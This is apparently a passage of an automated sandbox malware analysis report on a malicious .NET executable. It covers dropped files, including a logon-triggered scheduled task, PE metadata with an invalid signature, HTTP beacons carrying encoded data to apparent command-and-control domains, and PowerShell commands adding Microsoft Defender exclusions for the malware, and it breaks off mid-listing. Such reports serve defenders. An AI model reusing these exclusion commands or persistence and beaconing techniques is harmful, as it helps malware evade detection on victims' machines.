Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp1454.tmp

Download File

Process:	C:\Users\user\Desktop\FGGx944Qu7.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1577
Entropy (8bit):	5.1110539282546625
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaIGLxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTev
MD5:	F5A32EE27570DB7ED724677268C9778B
SHA1:	55270ECB864E0F02B8258C440A06DF27ECC02C6F
SHA-256:	62FE36F805962CBB20FFA8616A8B37F2FF5628B6B64F65523EA4753B13D76FB6
SHA-512:	C4A42E20B48849299807A98728C0CB3DC1286223F4C3BF0D430DCDA25F1E28BC7CC8273B0524FCC61613A138D0155D5917DE335601D649DB4893B448B9B80450
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp350B.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1577
Entropy (8bit):	5.1110539282546625
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaIGLxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTev
MD5:	F5A32EE27570DB7ED724677268C9778B
SHA1:	55270ECB864E0F02B8258C440A06DF27ECC02C6F
SHA-256:	62FE36F805962CBB20FFA8616A8B37F2FF5628B6B64F65523EA4753B13D76FB6
SHA-512:	C4A42E20B48849299807A98728C0CB3DC1286223F4C3BF0D430DCDA25F1E28BC7CC8273B0524FCC61613A138D0155D5917DE335601D649DB4893B448B9B80450
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Download File

Process:	C:\Users\user\Desktop\FGGx944Qu7.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	758280
Entropy (8bit):	7.978851063770012
Encrypted:	false
SSDEEP:	12288:CdrLbDZaNRp7+ur4n+Hriagc4UHQlb/xk/ouztXHUT5izyRnA37CB9CdkR:cLDZMRpQnari1c4NR/Wouzt3AkMnA+sA
MD5:	21D18E20B8B0E17E0B554B5940A7AAED
SHA1:	BAD65794A2BC8C23D373F82E11978F11AF1AF57D
SHA-256:	B600C43E2980691952532A79E7A0AEF2351AEEF6F740FD2F56647509C93B6DA0
SHA-512:	D08D0F4D86EABB1C1EC5CDA10675794C0A82E8574E2F5DCB5B56330FF6AFC5AAB94FFBE328B316038ADC5F810DF429D6B6A1DC7842280D3B6072C0F24FBCFCB1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62% Antivirus: Virustotal, Detection: 67%, Browse
Joe Sandbox View:	Filename: APR0927,24.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ff..............0..8...".......W... ...`....@.. ....................................@..................................V..O....`...............\...6........................................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`... ...:..............@..@.reloc...............Z..............@..B.................V......H.......t?..X;......(....z................................................{...."..}........0.............(2...o........+......0........... @B...(2...o.....(....[.+......0..v........s.......{....o....o.....+4.o....t.......o.........(....( .....,...t....o!......o"...-....u........,...o#........+.............@Y.......0...........(@...oI....+...0............($....+...0............{....o%....+......0...........(@...oA....+...0............ .... .... ....(&....+....0.."...

C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\FGGx944Qu7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.978851063770012
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FGGx944Qu7.exe
File size:	758'280 bytes
MD5:	21d18e20b8b0e17e0b554b5940a7aaed
SHA1:	bad65794a2bc8c23d373f82e11978f11af1af57d
SHA256:	b600c43e2980691952532a79e7a0aef2351aeef6f740fd2f56647509c93b6da0
SHA512:	d08d0f4d86eabb1c1ec5cda10675794c0a82e8574e2f5dcb5b56330ff6afc5aab94ffbe328b316038adc5f810df429d6b6a1dc7842280d3b6072c0f24fbcfcb1
SSDEEP:	12288:CdrLbDZaNRp7+ur4n+Hriagc4UHQlb/xk/ouztXHUT5izyRnA37CB9CdkR:cLDZMRpQnari1c4NR/Wouzt3AkMnA+sA
TLSH:	B4F423DBAB74E121DA310F35E4F0AB0563724C948A5ED359A9F050D98E97FE0A7118CF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ff..............0..8...".......W... ...`....@.. ....................................@................................

File Icon


Icon Hash:	1fb3b1a50d818f8c

Static PE Info

General

Entrypoint:	0x4b570e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6646D806 [Fri May 17 04:07:34 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	12/11/2018 19:00:00 08/11/2021 18:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb56bc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb6000	0x1ecc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb5c00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb3714	0xb3800	7aeb3253edbbbe13f9349ed13a4771f0	False	0.9753587983112814	SysEx File -	7.9850458366692925	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb6000	0x1ecc	0x2000	fbd839ddcd3fbbcfef5b4728eca5bd52	False	0.7943115234375	data	7.26218700052124	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb8000	0xc	0x200	db433f0180eff3050b24cbe2b1f454f3	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb6100	0x1725	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.939915611814346
RT_GROUP_ICON	0xb7838	0x14	data	1.05
RT_VERSION	0xb785c	0x470	data	0.4234154929577465
RT_MANIFEST	0xb7cdc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 19, 2024 08:05:40.644273996 CEST	49745	80	192.168.2.4	34.149.87.45
May 19, 2024 08:05:41.632376909 CEST	49745	80	192.168.2.4	34.149.87.45
May 19, 2024 08:05:43.632159948 CEST	49745	80	192.168.2.4	34.149.87.45
May 19, 2024 08:05:47.632127047 CEST	49745	80	192.168.2.4	34.149.87.45
May 19, 2024 08:05:55.647808075 CEST	49745	80	192.168.2.4	34.149.87.45
May 19, 2024 08:06:06.686194897 CEST	49754	80	192.168.2.4	172.67.140.176
May 19, 2024 08:06:06.697779894 CEST	80	49754	172.67.140.176	192.168.2.4
May 19, 2024 08:06:06.698401928 CEST	49754	80	192.168.2.4	172.67.140.176
May 19, 2024 08:06:06.700943947 CEST	49754	80	192.168.2.4	172.67.140.176
May 19, 2024 08:06:06.712096930 CEST	80	49754	172.67.140.176	192.168.2.4
May 19, 2024 08:06:06.712138891 CEST	80	49754	172.67.140.176	192.168.2.4
May 19, 2024 08:06:06.713218927 CEST	49754	80	192.168.2.4	172.67.140.176
May 19, 2024 08:06:06.714392900 CEST	49754	80	192.168.2.4	172.67.140.176
May 19, 2024 08:06:06.726528883 CEST	80	49754	172.67.140.176	192.168.2.4
May 19, 2024 08:06:06.726536036 CEST	80	49754	172.67.140.176	192.168.2.4
May 19, 2024 08:06:21.783179045 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:22.788397074 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:24.788537979 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:28.788404942 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:28.843334913 CEST	80	49758	199.59.243.225	192.168.2.4
May 19, 2024 08:06:28.843456030 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:28.845993042 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:28.898433924 CEST	80	49758	199.59.243.225	192.168.2.4
May 19, 2024 08:06:28.898443937 CEST	80	49758	199.59.243.225	192.168.2.4
May 19, 2024 08:06:28.898515940 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:28.910650015 CEST	80	49758	199.59.243.225	192.168.2.4
May 19, 2024 08:06:31.369384050 CEST	49760	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:32.382164001 CEST	49760	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:34.397778988 CEST	49760	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:34.410768032 CEST	80	49760	199.59.243.225	192.168.2.4
May 19, 2024 08:06:34.410866022 CEST	49760	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:34.412725925 CEST	49760	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:34.420372009 CEST	80	49760	199.59.243.225	192.168.2.4
May 19, 2024 08:06:34.420394897 CEST	80	49760	199.59.243.225	192.168.2.4
May 19, 2024 08:06:36.948486090 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:37.960351944 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:39.960347891 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:43.991570950 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:51.991668940 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:59.010922909 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:07:00.023277998 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:07:02.038575888 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:07:06.038486958 CEST	49761	80	192.168.2.4	199.59.243.225

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 19, 2024 08:05:39.581056118 CEST	64510	53	192.168.2.4	1.1.1.1
May 19, 2024 08:05:40.585340977 CEST	64510	53	192.168.2.4	1.1.1.1
May 19, 2024 08:05:40.638453960 CEST	53	64510	1.1.1.1	192.168.2.4
May 19, 2024 08:05:59.992341995 CEST	49195	53	192.168.2.4	1.1.1.1
May 19, 2024 08:06:00.992129087 CEST	49195	53	192.168.2.4	1.1.1.1
May 19, 2024 08:06:01.158293962 CEST	53	49195	1.1.1.1	192.168.2.4
May 19, 2024 08:06:06.668118000 CEST	62821	53	192.168.2.4	1.1.1.1
May 19, 2024 08:06:06.683228970 CEST	53	62821	1.1.1.1	192.168.2.4
May 19, 2024 08:06:21.760849953 CEST	63578	53	192.168.2.4	1.1.1.1
May 19, 2024 08:06:21.780852079 CEST	53	63578	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 19, 2024 08:05:39.581056118 CEST	192.168.2.4	1.1.1.1	0x3fa2	Standard query (0)	www.birthingwitht.com	A (IP address)	IN (0x0001)	false
May 19, 2024 08:05:40.585340977 CEST	192.168.2.4	1.1.1.1	0x3fa2	Standard query (0)	www.birthingwitht.com	A (IP address)	IN (0x0001)	false
May 19, 2024 08:05:59.992341995 CEST	192.168.2.4	1.1.1.1	0x64dd	Standard query (0)	www.birthingwitht.com	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:00.992129087 CEST	192.168.2.4	1.1.1.1	0x64dd	Standard query (0)	www.birthingwitht.com	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:06.668118000 CEST	192.168.2.4	1.1.1.1	0x1301	Standard query (0)	www.oobzxod2xn.cc	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:21.760849953 CEST	192.168.2.4	1.1.1.1	0xbad3	Standard query (0)	www.drapples.club	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 19, 2024 08:05:40.638453960 CEST	1.1.1.1	192.168.2.4	0x3fa2	No error (0)	www.birthingwitht.com	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
May 19, 2024 08:05:40.638453960 CEST	1.1.1.1	192.168.2.4	0x3fa2	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
May 19, 2024 08:05:40.638453960 CEST	1.1.1.1	192.168.2.4	0x3fa2	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:01.158293962 CEST	1.1.1.1	192.168.2.4	0x64dd	No error (0)	www.birthingwitht.com	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
May 19, 2024 08:06:01.158293962 CEST	1.1.1.1	192.168.2.4	0x64dd	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
May 19, 2024 08:06:01.158293962 CEST	1.1.1.1	192.168.2.4	0x64dd	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:06.683228970 CEST	1.1.1.1	192.168.2.4	0x1301	No error (0)	www.oobzxod2xn.cc		172.67.140.176	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:06.683228970 CEST	1.1.1.1	192.168.2.4	0x1301	No error (0)	www.oobzxod2xn.cc		104.21.54.171	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:21.780852079 CEST	1.1.1.1	192.168.2.4	0xbad3	No error (0)	www.drapples.club	94950.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
May 19, 2024 08:06:21.780852079 CEST	1.1.1.1	192.168.2.4	0xbad3	No error (0)	94950.bodis.com		199.59.243.225	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.oobzxod2xn.cc

www.drapples.club

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49754	172.67.140.176	80	2492	C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe

Timestamp	Bytes transferred	Direction	Data
May 19, 2024 08:06:06.700943947 CEST	466	OUT	GET /q0r6/?uZgP=5pyvScKx6ZbOO2uX774/2f03V4PpvoLdLg/OCd1FMvXsxJY7YeHi6SxOzHnr25kvmJZHa8XXHydHc3e54xwdxF+eQrhYMnjeuarocBe7v18XiUqzaWXVlPw=&a6m=8Rw4HDhPzbgPS HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.oobzxod2xn.cc Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49758	199.59.243.225	80	2492	C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe

Timestamp	Bytes transferred	Direction	Data
May 19, 2024 08:06:28.845993042 CEST	730	OUT	POST /q0r6/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Host: www.drapples.club Origin: http://www.drapples.club Referer: http://www.drapples.club/q0r6/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 75 5a 67 50 3d 36 54 37 73 6c 75 67 4c 55 76 59 57 51 53 5a 7a 65 38 54 44 57 75 2f 74 6a 45 67 77 77 4a 67 6d 63 67 50 70 30 4c 47 57 51 37 58 70 48 6e 51 4f 51 6b 50 50 47 37 69 57 30 6c 57 31 6d 4c 2f 41 6a 78 5a 52 4c 4e 57 58 69 6d 68 44 73 45 73 75 39 70 7a 68 42 4a 71 67 48 48 70 55 2b 37 66 71 6d 42 75 44 33 75 4b 68 66 32 32 71 4e 6f 46 62 6a 32 72 39 4d 78 43 68 6e 50 77 57 65 30 47 64 76 37 4f 75 69 65 65 4e 74 43 4c 48 71 59 71 4e 41 70 50 4a 48 2f 77 77 68 4c 45 75 64 4d 76 6b 36 52 30 39 7a 69 4e 55 67 56 4e 69 70 39 65 75 51 48 37 67 6a 44 44 43 6b 50 38 68 2b 2b 38 74 4f 51 3d 3d Data Ascii: uZgP=6T7slugLUvYWQSZze8TDWu/tjEgwwJgmcgPp0LGWQ7XpHnQOQkPPG7iW0lW1mL/AjxZRLNWXimhDsEsu9pzhBJqgHHpU+7fqmBuD3uKhf22qNoFbj2r9MxChnPwWe0Gdv7OuieeNtCLHqYqNApPJH/wwhLEudMvk6R09ziNUgVNip9euQH7gjDDCkP8h++8tOQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49760	199.59.243.225	80	2492	C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe

Timestamp	Bytes transferred	Direction	Data
May 19, 2024 08:06:34.412725925 CEST	750	OUT	POST /q0r6/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Host: www.drapples.club Origin: http://www.drapples.club Referer: http://www.drapples.club/q0r6/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 75 5a 67 50 3d 36 54 37 73 6c 75 67 4c 55 76 59 57 54 32 64 7a 53 37 6e 44 58 4f 2f 71 76 6b 67 77 35 70 68 4f 63 68 7a 70 30 50 65 47 51 4a 7a 70 47 47 67 4f 52 68 37 50 48 37 69 57 67 31 57 30 6c 37 2f 66 6a 78 64 76 4c 50 43 58 69 6d 31 44 73 47 6b 75 39 36 4c 6d 42 5a 71 69 65 58 70 61 77 62 66 71 6d 42 75 44 33 75 4f 50 66 32 75 71 4e 5a 56 62 69 55 44 2b 51 42 43 67 75 76 77 57 61 30 47 5a 76 37 4f 4d 69 62 36 6e 74 41 44 48 71 5a 36 4e 42 34 50 47 4f 2f 77 32 73 72 46 6b 51 4a 4c 74 33 69 56 6c 31 6b 46 7a 76 47 35 7a 6f 37 50 30 42 32 61 33 78 44 6e 78 35 49 31 56 7a 39 42 6b 56 5a 66 46 53 4f 49 77 45 78 4f 53 52 39 53 52 67 4b 50 34 65 63 45 3d Data Ascii: uZgP=6T7slugLUvYWT2dzS7nDXO/qvkgw5phOchzp0PeGQJzpGGgORh7PH7iWg1W0l7/fjxdvLPCXim1DsGku96LmBZqieXpawbfqmBuD3uOPf2uqNZVbiUD+QBCguvwWa0GZv7OMib6ntADHqZ6NB4PGO/w2srFkQJLt3iVl1kFzvG5zo7P0B2a3xDnx5I1Vz9BkVZfFSOIwExOSR9SRgKP4ecE=

Target ID:	0
Start time:	02:04:51
Start date:	19/05/2024
Path:	C:\Users\user\Desktop\FGGx944Qu7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FGGx944Qu7.exe"
Imagebase:	0xba0000
File size:	758'280 bytes
MD5 hash:	21D18E20B8B0E17E0B554B5940A7AAED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:04:54
Start date:	19/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe"
Imagebase:	0xf90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:04:54
Start date:	19/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:04:54
Start date:	19/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Imagebase:	0xf90000
